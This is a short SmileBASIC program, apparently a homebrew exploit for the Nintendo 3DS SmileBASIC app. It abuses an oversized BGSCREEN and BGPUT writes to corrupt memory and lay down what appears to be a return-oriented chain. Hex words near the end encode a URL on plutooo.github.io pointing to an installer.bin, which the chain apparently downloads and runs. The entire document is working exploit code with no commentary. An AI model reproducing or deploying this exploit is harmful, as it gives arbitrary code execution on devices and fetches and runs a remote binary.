OA$="<INSERT OTHERAPP HERE>"
BGSCREEN 0,1073741824,2
B0=BGGET(0,2,0)
B1=BGGET(0,2,1)
B=((B1 OR (B0 << 16))+16)/4
DEF W A,V
  BGPUT 0,A+0-B,0,V>>16
  BGPUT 0,A+0-B,1,V
END

W 0,&H0
W 1,&H400000
W 2,&H0
W 3,&H100
W 4,&H1
W 8,&H4
W 16,&H0
W 19,&H0
W 20,&H400000
W 21,&H0
W 23,&H0
W 24,&H400000
W 25,&H0
W 26,&H30010000
W 27,&H800
W 31,&H0
W 33,&H0
W 34,&H30010000
W 35,&H0
W 36,&H0
W 37,&H0

W 64,&H70747468
W 65,&H2F2F3A73
W 66,&H74756C70
W 67,&H2E6F6F6F
W 68,&H68746967
W 69,&H692E6275
W 70,&H6D732F6F
W 71,&H68656C69
W 72,&H6F2F7861
W 73,&H755F646C
W 74,&H32336173
W 75,&H6E692F31
W 76,&H6C617473
W 77,&H2E72656C
W 78,&H6E6962
